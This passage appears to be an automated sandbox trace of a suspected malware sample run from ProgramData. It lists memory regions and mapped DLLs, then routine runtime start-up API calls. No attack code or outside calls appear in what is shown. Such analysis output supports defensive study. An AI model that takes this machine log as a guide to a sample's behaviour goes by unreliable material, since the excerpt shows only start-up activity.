0x3e80000 end_va = 0x3e80fff entry_point = 0x0 region_type = private name = "private_0x0000000003e80000" filename = "" Region: id = 2672 start_va = 0x3e90000 end_va = 0x3e90fff entry_point = 0x0 region_type = private name = "private_0x0000000003e90000" filename = "" Region: id = 2673 start_va = 0x3ea0000 end_va = 0x3ea0fff entry_point = 0x0 region_type = private name = "private_0x0000000003ea0000" filename = "" Region: id = 2674 start_va = 0x3eb0000 end_va = 0x3eb0fff entry_point = 0x0 region_type = private name = "private_0x0000000003eb0000" filename = "" Region: id = 2675 start_va = 0x3ec0000 end_va = 0x3ec0fff entry_point = 0x0 region_type = private name = "private_0x0000000003ec0000" filename = "" Region: id = 2676 start_va = 0x3ed0000 end_va = 0x3ed0fff entry_point = 0x0 region_type = private name = "private_0x0000000003ed0000" filename = "" Region: id = 2677 start_va = 0x3ee0000 end_va = 0x3ee0fff entry_point = 0x0 region_type = private name = "private_0x0000000003ee0000" filename = "" Region: id = 2678 start_va = 0x3ef0000 end_va = 0x3ef0fff entry_point = 0x0 region_type = private name = "private_0x0000000003ef0000" filename = "" Region: id = 2679 start_va = 0x3f00000 end_va = 0x3f00fff entry_point = 0x0 region_type = private name = "private_0x0000000003f00000" filename = "" Region: id = 2680 start_va = 0x3f10000 end_va = 0x3f10fff entry_point = 0x0 region_type = private name = "private_0x0000000003f10000" filename = "" Region: id = 2681 start_va = 0x3f20000 end_va = 0x3f20fff entry_point = 0x0 region_type = private name = "private_0x0000000003f20000" filename = "" Region: id = 2682 start_va = 0x3f30000 end_va = 0x3f30fff entry_point = 0x0 region_type = private name = "private_0x0000000003f30000" filename = "" Region: id = 2683 start_va = 0x3f40000 end_va = 0x3f40fff entry_point = 0x0 region_type = private name = "private_0x0000000003f40000" filename = "" Region: id = 2684 start_va = 0x3f50000 end_va = 0x3f50fff entry_point = 0x0 region_type = private name = "private_0x0000000003f50000" filename = "" Region: id = 2685 start_va = 0x3f60000 end_va = 0x3f60fff entry_point = 0x0 region_type = private name = "private_0x0000000003f60000" filename = "" Region: id = 2686 start_va = 0x3f70000 end_va = 0x3f70fff entry_point = 0x0 region_type = private name = "private_0x0000000003f70000" filename = "" Region: id = 2687 start_va = 0x3f80000 end_va = 0x3f80fff entry_point = 0x0 region_type = private name = "private_0x0000000003f80000" filename = "" Region: id = 2688 start_va = 0x3f90000 end_va = 0x3f90fff entry_point = 0x0 region_type = private name = "private_0x0000000003f90000" filename = "" Region: id = 2689 start_va = 0x3fa0000 end_va = 0x3fa0fff entry_point = 0x0 region_type = private name = "private_0x0000000003fa0000" filename = "" Region: id = 2690 start_va = 0x3fb0000 end_va = 0x3fb0fff entry_point = 0x0 region_type = private name = "private_0x0000000003fb0000" filename = "" Region: id = 2691 start_va = 0x3fc0000 end_va = 0x3fc0fff entry_point = 0x0 region_type = private name = "private_0x0000000003fc0000" filename = "" Region: id = 2692 start_va = 0x7ef83000 end_va = 0x7ef85fff entry_point = 0x0 region_type = private name = "private_0x000000007ef83000" filename = "" Region: id = 2693 start_va = 0x7ef86000 end_va = 0x7ef88fff entry_point = 0x0 region_type = private name = "private_0x000000007ef86000" filename = "" Region: id = 2694 start_va = 0x7ef89000 end_va = 0x7ef8bfff entry_point = 0x0 region_type = private name = "private_0x000000007ef89000" filename = "" Region: id = 2695 start_va = 0x7ef8c000 end_va = 0x7ef8efff entry_point = 0x0 region_type = private name = "private_0x000000007ef8c000" filename = "" Region: id = 2696 start_va = 0x7ef8f000 end_va = 0x7ef91fff entry_point = 0x0 region_type = private name = "private_0x000000007ef8f000" filename = "" Region: id = 2697 start_va = 0x7ef92000 end_va = 0x7ef94fff entry_point = 0x0 region_type = private name = "private_0x000000007ef92000" filename = "" Region: id = 2698 start_va = 0x7ef95000 end_va = 0x7ef97fff entry_point = 0x0 region_type = private name = "private_0x000000007ef95000" filename = "" Region: id = 2699 start_va = 0x7ef98000 end_va = 0x7ef9afff entry_point = 0x0 region_type = private name = "private_0x000000007ef98000" filename = "" Region: id = 2700 start_va = 0x7ef9b000 end_va = 0x7ef9dfff entry_point = 0x0 region_type = private name = "private_0x000000007ef9b000" filename = "" Region: id = 2701 start_va = 0x7ef9e000 end_va = 0x7efa0fff entry_point = 0x0 region_type = private name = "private_0x000000007ef9e000" filename = "" Region: id = 2702 start_va = 0x7efa1000 end_va = 0x7efa3fff entry_point = 0x0 region_type = private name = "private_0x000000007efa1000" filename = "" Region: id = 2703 start_va = 0x7efa4000 end_va = 0x7efa6fff entry_point = 0x0 region_type = private name = "private_0x000000007efa4000" filename = "" Region: id = 2704 start_va = 0x3fd0000 end_va = 0x3fd0fff entry_point = 0x0 region_type = private name = "private_0x0000000003fd0000" filename = "" Region: id = 2705 start_va = 0x3fd0000 end_va = 0x3fd0fff entry_point = 0x0 region_type = private name = "private_0x0000000003fd0000" filename = "" Region: id = 2706 start_va = 0x3fd0000 end_va = 0x3fd0fff entry_point = 0x0 region_type = private name = "private_0x0000000003fd0000" filename = "" Region: id = 2707 start_va = 0x3fd0000 end_va = 0x3fd0fff entry_point = 0x0 region_type = private name = "private_0x0000000003fd0000" filename = "" Region: id = 2708 start_va = 0x3fd0000 end_va = 0x3fd0fff entry_point = 0x0 region_type = private name = "private_0x0000000003fd0000" filename = "" Region: id = 2709 start_va = 0x3fd0000 end_va = 0x3fd0fff entry_point = 0x0 region_type = private name = "private_0x0000000003fd0000" filename = "" Region: id = 2710 start_va = 0x3fd0000 end_va = 0x3fd0fff entry_point = 0x0 region_type = private name = "private_0x0000000003fd0000" filename = "" Region: id = 2711 start_va = 0x3fd0000 end_va = 0x3fd0fff entry_point = 0x0 region_type = private name = "private_0x0000000003fd0000" filename = "" Region: id = 2712 start_va = 0x3fd0000 end_va = 0x3fd0fff entry_point = 0x0 region_type = private name = "private_0x0000000003fd0000" filename = "" Region: id = 2713 start_va = 0x3fd0000 end_va = 0x3fd0fff entry_point = 0x0 region_type = private name = "private_0x0000000003fd0000" filename = "" Region: id = 2714 start_va = 0x3fd0000 end_va = 0x3fd0fff entry_point = 0x0 region_type = private name = "private_0x0000000003fd0000" filename = "" Region: id = 2715 start_va = 0x3fd0000 end_va = 0x3fd0fff entry_point = 0x0 region_type = private name = "private_0x0000000003fd0000" filename = "" Region: id = 2716 start_va = 0x3fd0000 end_va = 0x3fd0fff entry_point = 0x0 region_type = private name = "private_0x0000000003fd0000" filename = "" Region: id = 2717 start_va = 0x3fd0000 end_va = 0x3fd0fff entry_point = 0x0 region_type = private name = "private_0x0000000003fd0000" filename = "" Region: id = 2718 start_va = 0x3fd0000 end_va = 0x3fd0fff entry_point = 0x0 region_type = private name = "private_0x0000000003fd0000" filename = "" Region: id = 2719 start_va = 0x3fd0000 end_va = 0x3fd0fff entry_point = 0x0 region_type = private name = "private_0x0000000003fd0000" filename = "" Region: id = 2720 start_va = 0x3fd0000 end_va = 0x3fd0fff entry_point = 0x0 region_type = private name = "private_0x0000000003fd0000" filename = "" Region: id = 2721 start_va = 0x3fd0000 end_va = 0x3fd0fff entry_point = 0x0 region_type = private name = "private_0x0000000003fd0000" filename = "" Region: id = 2722 start_va = 0x3fe0000 end_va = 0x40dffff entry_point = 0x0 region_type = private name = "private_0x0000000003fe0000" filename = "" Region: id = 2723 start_va = 0x3fd0000 end_va = 0x3fd0fff entry_point = 0x0 region_type = private name = "private_0x0000000003fd0000" filename = "" Region: id = 2724 start_va = 0x3fd0000 end_va = 0x3fd0fff entry_point = 0x0 region_type = private name = "private_0x0000000003fd0000" filename = "" Region: id = 2725 start_va = 0x746f0000 end_va = 0x74740fff entry_point = 0x7471988c region_type = mapped_file name = "winspool.drv" filename = "\\Windows\\SysWOW64\\winspool.drv" (normalized: "c:\\windows\\syswow64\\winspool.drv") Region: id = 2726 start_va = 0x40e0000 end_va = 0x41dffff entry_point = 0x0 region_type = private name = "private_0x00000000040e0000" filename = "" Region: id = 2727 start_va = 0x75ef0000 end_va = 0x7600cfff entry_point = 0x75ef158a region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\SysWOW64\\crypt32.dll" (normalized: "c:\\windows\\syswow64\\crypt32.dll") Region: id = 2728 start_va = 0x76010000 end_va = 0x7601bfff entry_point = 0x7601238e region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\SysWOW64\\msasn1.dll" (normalized: "c:\\windows\\syswow64\\msasn1.dll") Region: id = 2729 start_va = 0x41e0000 end_va = 0x42dffff entry_point = 0x0 region_type = private name = "private_0x00000000041e0000" filename = "" Region: id = 2730 start_va = 0x746d0000 end_va = 0x746e1fff entry_point = 0x746d1200 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\SysWOW64\\mpr.dll" (normalized: "c:\\windows\\syswow64\\mpr.dll") Thread: id = 205 os_tid = 0x564 [0083.854] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ff7c | out: lpSystemTimeAsFileTime=0x18ff7c*(dwLowDateTime=0x35095140, dwHighDateTime=0x1d35d7b)) [0083.855] GetCurrentProcessId () returned 0x560 [0083.855] GetCurrentThreadId () returned 0x564 [0083.855] GetTickCount () returned 0x3fdc [0083.855] QueryPerformanceCounter (in: lpPerformanceCount=0x18ff74 | out: lpPerformanceCount=0x18ff74*=74291221) returned 1 [0083.855] GetStartupInfoW (in: lpStartupInfo=0x18ff20 | out: lpStartupInfo=0x18ff20*(cb=0x44, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\ProgramData\\BCE1010314.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x18ff84, hStdError=0x55834233)) [0083.855] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0083.856] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75ce0000 [0083.856] GetProcAddress (hModule=0x75ce0000, lpProcName="FlsAlloc") returned 0x75cf4f2b [0083.856] GetProcAddress (hModule=0x75ce0000, lpProcName="FlsGetValue") returned 0x75cf1252 [0083.856] GetProcAddress (hModule=0x75ce0000, lpProcName="FlsSetValue") returned 0x75cf4208 [0083.856] GetProcAddress (hModule=0x75ce0000, lpProcName="FlsFree") returned 0x75cf359f [0083.857] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75ce0000 [0083.857] GetCurrentThreadId () returned 0x564 [0083.857] GetStartupInfoW (in: lpStartupInfo=0x18febc | out: lpStartupInfo=0x18febc*(cb=0x44, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\ProgramData\\BCE1010314.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x5582f736, hStdOutput=0x5582fa6f, hStdError=0x1cc07d0)) [0083.857] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0083.857] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0083.857] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0083.857] SetHandleCount (uNumber=0x20) returned 0x20 [0083.857] GetCommandLineA () returned="\"C:\\ProgramData\\BCE1010314.exe\" " [0083.857] GetEnvironmentStringsW () returned 0x28cb58* [0083.857] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=::=::\\", cchWideChar=1409, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1409 [0083.857] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=::=::\\", cchWideChar=1409, lpMultiByteStr=0x1cc11f8, cbMultiByte=1409, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=::=::\\", lpUsedDefaultChar=0x0) returned 1409 [0083.857] FreeEnvironmentStringsW (penv=0x28cb58) returned 1 [0083.857] GetLastError () returned 0x65b [0083.858] SetLastError (dwErrCode=0x65b) [0083.858] GetLastError () returned 0x65b [0083.858] SetLastError (dwErrCode=0x65b) [0083.858] GetLastError () returned 0x65b [0083.858] SetLastError (dwErrCode=0x65b) [0083.858] GetACP () returned 0x4e4 [0083.858] GetLastError () returned 0x65b [0083.858] SetLastError (dwErrCode=0x65b) [0083.858] IsValidCodePage (CodePage=0x4e4) returned 1 [0083.858] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18fe84 | out: lpCPInfo=0x18fe84) returned 1 [0083.858] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f950 | out: lpCPInfo=0x18f950) returned 1 [0083.858] GetLastError () returned 0x65b [0083.858] SetLastError (dwErrCode=0x65b) [0083.858] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0083.858] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f6c8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0083.858] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18f964 | out: lpCharType=0x18f964) returned 1 [0083.858] GetLastError () returned 0x65b [0083.858] SetLastError (dwErrCode=0x65b) [0083.858] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0083.858] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f698, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ࿋ㇰ䱳喃Ā") returned 256 [0083.858] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ࿋ㇰ䱳喃Ā", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0083.858] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ࿋ㇰ䱳喃Ā", cchSrc=256, lpDestStr=0x18f488, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ") returned 256 [0083.858] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ", cchWideChar=256, lpMultiByteStr=0x18fc64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x1e\x82½1\x9cþ\x18", lpUsedDefaultChar=0x0) returned 256 [0083.858] GetLastError () returned 0x65b [0083.858] SetLastError (dwErrCode=0x65b) [0083.858] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0083.858] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f6b8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ࿋ㇰ䱳喃Ā") returned 256 [0083.859] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ࿋ㇰ䱳喃Ā", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0083.859] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ࿋ㇰ䱳喃Ā", cchSrc=256, lpDestStr=0x18f4a8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ") returned 256 [0083.859] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ", cchWideChar=256, lpMultiByteStr=0x18fb64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f 